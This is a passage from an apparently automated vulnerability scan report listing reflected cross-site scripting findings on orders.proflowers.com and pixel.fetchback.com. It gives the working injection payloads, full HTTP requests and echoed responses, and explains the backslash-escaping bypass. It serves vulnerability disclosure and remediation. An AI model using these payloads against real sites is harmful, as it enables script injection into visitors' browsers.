Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:28:03 GMT
Content-Length: 62385


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBScb909\\";alert(1)//3c15789ae2e"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event42";

   if ("" != "") {
       events
...[SNIP]...

4.175. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66d3d\"%3balert(1)//c331d736d2e was submitted in the trackingpgroup parameter. This input was echoed as 66d3d\\";alert(1)//c331d736d2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx?flexShown=False&scAddItem=true&flexChosen=False&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&selectedrelationshipID=293461&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&trackingpgroup=PBS66d3d\"%3balert(1)//c331d736d2e&deliveryon=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:35:04 GMT
Content-Length: 49389


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBS66d3d\\";alert(1)//c331d736d2e"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event6";

   if ("" != "") {
       events +
...[SNIP]...

4.176. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e370\"%3balert(1)//51a496b9619 was submitted in the trackingpgroup parameter. This input was echoed as 5e370\\";alert(1)//51a496b9619 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx?flexShown=False&deliveryon=True&scAddItem=true&flexChosen=False&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&selectedrelationshipID=293461&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/25/2011&pid=30008396&ssid=27&COBRAND=pfc&trackingpgroup=PBS5e370\"%3balert(1)//51a496b9619&ShowGiftOptions=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:34:53 GMT
Content-Length: 62306


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBS5e370\\";alert(1)//51a496b9619"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event42";

   if ("" != "") {
       events
...[SNIP]...

4.177. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a02c\"%3balert(1)//1b2e7429a7 was submitted in the trackingpgroup parameter. This input was echoed as 6a02c\\";alert(1)//1b2e7429a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA&trackingpgroup=PBS6a02c\"%3balert(1)//1b2e7429a7&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f24%2f2011&pid=30003767&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=168084 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:22:47 GMT
Content-Length: 46930


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBS6a02c\\";alert(1)//1b2e7429a7"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event3";

   if ("" != "") {
       events +
...[SNIP]...

4.178. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67d3f\"%3balert(1)//4a4ac1ba8fa was submitted in the trackingpgroup parameter. This input was echoed as 67d3f\\";alert(1)//4a4ac1ba8fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx?flexShown=False&deliveryon=True&scAddItem=true&flexChosen=False&tile=hmpg_podA&selectedrelationshipID=168084&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/24/2011&pid=30003767&ssid=27&COBRAND=pfc&trackingpgroup=PBS67d3f\"%3balert(1)//4a4ac1ba8fa&ShowGiftOptions=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:30:09 GMT
Content-Length: 46934


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBS67d3f\\";alert(1)//4a4ac1ba8fa"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event3";

   if ("" != "") {
       events +
...[SNIP]...

4.179. https://orders.proflowers.com/OrderProcess/Order.aspx [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/Order.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24de3\"%3balert(1)//6387582c293 was submitted in the trackingpgroup parameter. This input was echoed as 24de3\\";alert(1)//6387582c293 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/Order.aspx?flexShown=False&scAddItem=true&flexChosen=False&tile=hmpg_carousel&selectedrelationshipID=428685&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/25/2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&trackingpgroup=HPC24de3\"%3balert(1)//6387582c293&deliveryon=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:24:34 GMT
Content-Length: 46946


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "HPC24de3\\";alert(1)//6387582c293"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event3";

   if ("" != "") {
       events +
...[SNIP]...

4.180. http://pixel.fetchback.com/serve/fb/pdc [name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 2ccab<x%20style%3dx%3aexpression(alert(1))>059125350e6 was submitted in the name parameter. This input was echoed as 2ccab<x style=x:expression(alert(1))>059125350e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landing2ccab<x%20style%3dx%3aexpression(alert(1))>059125350e6&sid=3006 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
